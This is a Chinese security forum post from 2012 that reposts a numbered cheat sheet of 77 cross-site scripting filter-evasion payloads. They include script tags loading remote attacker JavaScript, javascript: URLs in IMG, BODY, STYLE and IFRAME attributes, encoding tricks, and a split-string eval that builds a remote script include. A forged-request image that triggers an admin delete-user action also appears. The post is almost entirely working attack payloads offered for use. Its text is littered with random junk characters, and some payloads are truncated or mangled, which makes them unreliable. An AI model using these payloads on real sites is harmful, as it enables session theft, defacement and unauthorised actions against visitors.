貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。2 J1 P; G! `8 G$ A2 |/ z4 x& a
- u% F3 W, [6 U& G- R, }+ @, X1 f4 ~
(1)普通的XSS JavaScript注入/ [- E# E+ g7 l, F4 p8 Y9 N
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>$ n1 G( `, D+ s! q) N- |
Y; Y3 V& i/ s, k1 n5 v9 u
(2)IMG标签XSS使用JavaScript命令% L. z' {( @' l1 a
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>' o4 e0 S4 J3 r* B1 G
6 i3 y* j! ^! Y! @% d' o (3)IMG标签无分号无引号
- x9 O3 N1 k2 C1 u( g0 U6 n) r <IMG SRC=javascript:alert(‘XSS’)>& p# b+ B9 z( ^ X6 D
. g) w5 t6 j: Y; D5 T" P* k- e, T (4)IMG标签大小写不敏感
- l" I% h5 o& a: B; D7 {( @. B, z2 ` <IMG SRC=JaVaScRiPt:alert(‘XSS’)>3 C6 ]7 P: ^ d) }* k: m
& k ~6 g: }& X. G2 q
(5)HTML编码(必须有分号)
j1 K: h" W; q; m: p/ Y/ C ]4 E( ^ <IMG SRC=javascript:alert(“XSS”)>
) S" Y" b$ i3 Y3 x, x" U( Q
/ x3 j! S5 Z2 ]& \1 D! F1 F' P" X (6)修正缺陷IMG标签
$ Z8 v9 T: W* f) H @. m <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>; T9 i! c5 E) } D! `$ ?' [
: e, }; J s9 _. x+ ^- Z# y& e
(7)formCharCode标签(计算器)
4 u/ A9 x. [0 ?& w* g/ h <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
2 M6 A' z9 O) R( e( R# l
, ? U5 s$ Z* m! v (8)UTF-8的Unicode编码(计算器)
+ Y/ s. r7 _: X/ T9 i <IMG SRC=jav..省略..S')>
6 z6 A! v) r4 ^! ^8 i6 C8 s* A# p [) J" c- ~, ]. S7 H
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)* L% V" X ~- X. b( u2 @8 Z
<IMG SRC=jav..省略..S')>% U4 t; a$ P& I8 k$ l
7 L& k8 Q. `0 ~% @7 X9 c (10)十六进制编码也是没有分号(计算器)
" j6 ?: h+ P( t3 B- o# \" o( J0 I <IMG SRC=java..省略..XSS')>( r1 V; g! M6 @$ ?
9 L+ P8 s$ V& g (11)嵌入式标签,将Javascript分开( R3 _9 N( v$ \7 S& L3 x
<IMG SRC=”jav ascript:alert(‘XSS’);”>) j9 S. d# i! P2 X U2 x, F- L
9 P, E/ q) z s! m$ W% f# ]
(12)嵌入式编码标签,将Javascript分开/ \! f7 }& J f
<IMG SRC=”jav ascript:alert(‘XSS’);”># ?6 e+ D' F3 @7 c Y
# D2 S* R/ Z# I( J9 _4 q6 n2 X+ E (13)嵌入式换行符
9 q) ] f" C6 e+ } {& }7 ^1 }. m <IMG SRC=”jav ascript:alert(‘XSS’);”>
6 [ B U# j7 m o) g0 d* U: L8 k
0 Y1 A9 T |7 D4 R3 X (14)嵌入式回车0 W( q' ~% v# A/ L4 {) j y
<IMG SRC=”jav ascript:alert(‘XSS’);”>4 i0 `; H) F: F+ l7 @
. k! }: b8 o% s( S% P6 q
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
; \6 d, P$ `) G! r9 W <IMG SRC=”javascript:alert(‘XSS‘)”>
j- y! X7 s% @1 G0 P) o; r
% S5 R: s2 P! h! j (16)解决限制字符(要求同页面)# N# O# C1 I1 @: \" |: f6 U9 q$ D
<script>z=’document.’</script>0 s" w+ o8 A. A( D ]4 c+ O
<script>z=z+’write(“‘</script>
( O$ O( ] u8 o' ]0 q <script>z=z+’<script’</script>( S; ?5 p' ?( L& ? _9 T1 |7 _% d4 T
<script>z=z+’ src=ht’</script>: X& l o5 F L) i
<script>z=z+’tp://ww’</script>
( ~' h. q+ C8 w) ^ <script>z=z+’w.shell’</script>) T3 a" x- d3 |" R1 h9 a2 k
<script>z=z+’.net/1.’</script>% _: N5 W) q* Q5 w) S" H
<script>z=z+’js></sc’</script>
+ b$ x! Z; q* K# `) ~/ @ <script>z=z+’ript>”)’</script>
2 ^6 f6 T/ }- J" k <script>eval_r(z)</script>' P" a" Q& W7 m! D+ u$ e
# L0 M) b2 W* {' b0 w8 k, u
(17)空字符
* { q) b1 `) ]+ ] perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
8 f( V4 T6 y# c
6 e) ^9 ^% _% [. s3 k% ?8 R (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
- T* Z+ @6 D4 t; L perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
; A, M5 t! g3 }3 C( r; d( b; b4 a* M+ V8 c% A% m
(19)Spaces和meta前的IMG标签
6 ^5 r s( w8 {! m1 A+ p& t <IMG SRC=” � javascript:alert(‘XSS’);”>
/ S6 g2 Z0 R2 j2 J0 Y% V# t5 f, X. x( q. D
(20)Non-alpha-non-digit XSS# l8 ~' I; Y7 H# u* ]
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>9 _. e3 p% |# _; @9 E2 r
1 u! k4 N) g' b, R5 k9 m v) ^ (21)Non-alpha-non-digit XSS to 2
5 Q% D/ K* z- F& z <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
' g7 N# N: `% C1 }! F1 I
% _ w6 o% {+ }, v$ b6 R (22)Non-alpha-non-digit XSS to 3
P- F1 s- d j: E& R2 E7 V3 l9 o <SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
) R- l! C3 Q% F* W$ R3 @4 b% _/ `& a5 X+ ?8 D" \7 [
(23)双开括号/ H7 i+ X5 [) ?2 D
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
# h4 K/ j8 @8 [4 d4 L7 K) g) b* N# R$ s7 }
(24)无结束脚本标记(仅火狐等浏览器)6 T& ?* B& V8 |$ t7 ^6 e
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>: S# i! o6 }2 D* b6 l0 m" t1 x
6 W& M' R7 n9 G+ J3 _# c# `
(25)无结束脚本标记2% \ {/ h& T$ d+ R( X6 F
<SCRIPT SRC=//3w.org/XSS/xss.js>
) X; X% P- m0 h% l; t' n: D G- C8 c# h( C
(26)半开的HTML/JavaScript XSS( z' \( _8 I) n! E: J; R' ?3 e3 \2 |' b
<IMG SRC=”javascript:alert(‘XSS’)”% Y3 L0 S% I) W& _& r
8 C& ]$ r. e" g
(27)双开角括号$ p1 `1 s! \. h* z2 Z K
<iframe src=http://3w.org/XSS.html <
8 Z5 {/ I7 \0 e: H. I# a/ R* x4 b: D/ p3 i( E9 f- j q4 Y/ J
(28)无单引号 双引号 分号
, K1 s# }/ c$ \ <SCRIPT>a=/XSS/( B+ |4 X J# h- f' e
alert(a.source)</SCRIPT>6 {# ?+ D; Y4 @$ l& F" H( Q
6 [7 M: _; d3 a1 y& i (29)换码过滤的JavaScript) g$ m1 L9 [& D U
\”;alert(‘XSS’);//
8 G+ N# `0 H* t) c7 e$ c& q8 M- L9 P$ N- R5 b/ [
(30)结束Title标签) D. m# I0 w' J; Y I
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>7 @& `: O6 M+ I
* z2 H x: f9 I/ Y: B2 S0 [ (31)Input Image
! \# Z9 E2 Z( h p) @$ _ <INPUT SRC=”javascript:alert(‘XSS’);”>
- Z3 [+ g* I6 k( d/ M5 y. I7 y: _% z$ C7 [! e" Z' u
(32)BODY Image. }0 r3 t# Y5 q
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
" C; Y4 o/ N9 b1 s' A- p
7 U- _; K1 U. s$ i% g/ P (33)BODY标签" F1 U \0 u% c9 F# W
<BODY(‘XSS’)>
, S) A" ?5 i) ?5 P2 r; c# M) f3 \) g; K x' O
(34)IMG Dynsrc g9 ^# \6 a! z) T3 \- W
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
) F" K" Y' g( }: P L7 f) K- Y
' V9 Z* B2 b) w5 m (35)IMG Lowsrc( P, ?; X0 C5 z) _5 H
<IMG LOWSRC=”javascript:alert(‘XSS’)”>. C' H# A$ W% I3 l
) t" {% z/ R7 g; V& w (36)BGSOUND
( N2 G5 l* ~0 E" V# N <BGSOUND SRC=”javascript:alert(‘XSS’);”>: A* r. K2 Z9 ]+ t
7 d' z* C$ Q0 ~' r1 k& A+ R
(37)STYLE sheet3 w R( f0 G* ^' W7 d' j9 x
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>9 q- r1 N( p! |, {8 E
( ^, o& T5 }2 ?2 B
(38)远程样式表
R4 \3 Q8 ~2 t0 V4 r <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>" @+ w2 Y2 Y* i0 n2 u5 @
; i. P3 T1 G6 S) w7 i }
(39)List-style-image(列表式)
* k$ k0 y7 Y& c' [7 R* a <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
( N; {9 J2 W0 \1 T) u2 }- o5 P
( W& S! N# s+ c+ o$ _3 D9 S9 P1 F" R (40)IMG VBscript; G V9 S6 z6 f8 C
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
* ~3 k" ^+ s9 P4 A* C& w: k9 D2 q/ Z( @8 K {/ V- m( \
(41)META链接url7 \' z4 [' y& S+ d; F" E
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>+ @! [$ V+ r) c2 g, _- [7 o. W- w
, B) ~& P6 O+ w! w! A+ }4 U (42)Iframe6 H' n* g& [) Z/ G" S- X( I2 L
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>1 Y2 q& k; w5 ?+ `9 u# P8 _! R. q, N
, y3 c" O( n* F (43)Frame
3 f$ Q1 a7 J5 n9 K9 Y <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>& z1 x/ l6 F- ^2 t
; Y) {6 W g' L Q* s
(44)Table0 M }& U9 Q/ R6 Q4 `
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
/ [+ @ i, g6 {# I% \
; _3 A# {6 n7 ?) c3 l1 _5 h (45)TD; ^; {) j$ a* P3 |' ~9 y; O; E
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
4 u. y8 Q. I- q& A1 M! x" D2 h [) P: G# \+ }$ {5 o! C" O0 B
(46)DIV background-image
' s# t& ]% J/ @7 @# T9 n5 S' l <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>4 w- a& P! z: ]2 O- g6 [
& u k5 b# D( d' F- u
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
/ Y0 b5 c; T+ ~# i' v <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>2 B* w0 y* k2 J0 v3 S
6 `- N; m$ b1 u (48)DIV expression( e L, L9 {2 R% E2 V' D6 D7 k
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>7 u. Z$ x' j+ i6 p. i
+ m: R& \/ X( \$ g! \
(49)STYLE属性分拆表达3 ?% p9 C2 y7 ]* N" h& n
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”> ^8 l1 @$ y# N% o! }
2 j! B5 I0 w& f1 Q, X (50)匿名STYLE(组成:开角号和一个字母开头), \% @7 @, \7 Z9 w; J! X2 x
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
, k0 U9 ]3 C( [8 |' x' o( w2 j; F: H) j) A$ s; E
(51)STYLE background-image9 `* o1 e6 f# L5 n1 A3 u. |. k _; u5 B
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
d. Y+ Y# u( j" o# N; T9 ^9 J) v, m$ [
(52)IMG STYLE方式9 t) k' b$ X1 x/ f$ ?- @ c# q
exppression(alert(“XSS”))’>0 O5 A' A2 X* X/ o1 S- E1 l) m/ Q
x" ?0 W4 t2 r+ l$ S& N- z' k0 `
(53)STYLE background
7 Z- U& R, O9 u# F <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
3 k2 u6 G+ Z' d5 f) J" c' l- c8 r. S. c" |
(54)BASE$ U+ D, k3 F* J3 B
<BASE HREF=”javascript:alert(‘XSS’);//”>0 e- f6 _/ S! u# v
7 D4 |6 h% m1 P+ o
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
8 M$ G5 k E( D <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>+ p5 z" ], A+ P) C/ z3 C! u
+ B! m6 S4 J/ {- B (56)在flash中使用ActionScrpt可以混进你XSS的代码
! `* M1 r- j) [ a=”get”;
" U' N2 s5 u+ z7 I0 x h b=”URL(\”";+ ] ?" i) E% g1 t" U& `# {
c=”javascript:”;# n. H- z4 X) ]4 c% p+ E
d=”alert(‘XSS’);\”)”;- Z. W" D3 I8 k( q
eval_r(a+b+c+d);( |; P, R' \0 R; ^) U
+ I+ C0 S+ I$ d5 w+ j) ^ (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
3 G" s8 [- v$ m2 m9 S <HTML xmlns:xss>
. J; X! O7 e' `7 B+ \ <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>6 H3 |0 |& F+ m
<xss:xss>XSS</xss:xss>* K5 c! A; q: r+ V; d
</HTML>, w c( Q3 K: t9 D4 f
0 B1 R# |4 [# s4 j
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用) F" B+ I e' j& ~8 e
<SCRIPT SRC=””></SCRIPT> B5 n# O) J9 K O( V' ~: d
" v4 g8 v& B. U% w' Q (59)IMG嵌入式命令,可执行任意命令8 e' z0 K- }( }9 M- E1 [6 x5 `" K3 L
<IMG SRC=”http://www.XXX.com/a.php?a=b”>+ T* y# C f# i. K6 b% h* Q6 \
! u7 o( j& M7 u; X (60)IMG嵌入式命令(a.jpg在同服务器)- P7 q% a2 \% n W! j* h1 r
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser! [ {5 E* ^& Q# I
- n5 D5 z: D" H+ }$ ]* G
(61)绕符号过滤, Z1 Q; `; y0 p7 v) W
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
/ Z+ s" `" a2 d: w' M- m2 q
2 _; P- _( `* H/ @0 L (62)
/ v: R; W( m0 f0 y7 T& s- e <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>5 B" ?; L. K) R, D$ s2 W
% s; C6 F2 E3 ~ (63)6 S# K Z/ T0 {( n
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
' Q( _, X' @" ~! u S- h7 j& v) y$ a9 ]1 v+ W$ H: w
(64)
4 i! E* j: _" ^- L% V- ~ z <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
; y W. X. ]5 G, i6 H% j
$ I6 b3 T$ d' z+ w! u T (65)
, R% i- O, {! U5 ], w: u. f& ~ <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
' Q* }& w4 g% ~0 L
# a; v& V! J6 l4 J N9 d. Y0 y. _ (66)+ q3 C& M& |5 ?- K! a6 ~
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
H) C5 C) M$ j, [
! q5 H6 c4 D0 {4 H1 [) j/ @( _ (67)
+ r" @' p. |3 J- D" V8 _" x" Y# }. j <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
7 z5 ^( Q5 N' N3 U" Y" V+ z! x. w* |, \3 ~
(68)URL绕行: J0 Z+ A; ?- V
<A HREF=”http://127.0.0.1/”>XSS</A>% l& M, y# `2 u
' O8 d& \# p7 I1 {, y3 }; o
(69)URL编码) S. H4 D( h5 d: ~6 F
<A HREF=”http://3w.org”>XSS</A>
5 I; Y2 z o# e; J; g2 v9 v+ u! z2 j+ r X; J) ` a
(70)IP十进制/ X3 N1 I) G. V. D, v! t, q6 X
<A HREF=”http://3232235521″>XSS</A>% r& G* J1 D( `2 ? y4 b
( U$ @! W$ ]4 a4 e: d
(71)IP十六进制4 X0 f8 s; `5 G% `% i$ J2 q
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
. t; @8 `6 ^! H$ W+ n$ S% x
+ p: ]" @' H! N) k) v, U# O( t3 r (72)IP八进制* u Y7 K# d( e+ N0 U
<A HREF=”http://0300.0250.0000.0001″>XSS</A>/ z% J* q; N# x1 R
! ^9 `" ]6 y1 M; F: w- z+ P4 D% Q# f (73)混合编码
8 m1 y% c+ p3 v7 z3 V; Y <A HREF=”h) x" f- F+ j4 \0 _
tt p://6 6.000146.0×7.147/”">XSS</A>" h3 _' G7 C% w t) V; c5 H
( J a( o$ Y5 f* [* X) ^4 r
(74)节省[http:]: }/ S; U/ F8 `+ a* o* _# y/ }
<A HREF=”//www.google.com/”>XSS</A>% J8 o) Z( }: q4 z
9 ]; f" y) ^$ @ {% A/ L7 d
(75)节省[www]
" q6 R. l6 W* A7 f! N- ~ <A HREF=”http://google.com/”>XSS</A>2 A7 V- }( `5 J
0 }% F8 k4 r; L5 Y' d. k
(76)绝对点绝对DNS/ q5 n0 Q; y4 u& \
<A HREF=”http://www.google.com./”>XSS</A>
0 W, x. t; l/ t3 a2 I4 q0 u4 W+ M/ X; p
(77)javascript链接! P, N$ t# M+ j( C
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
分享
支持
反对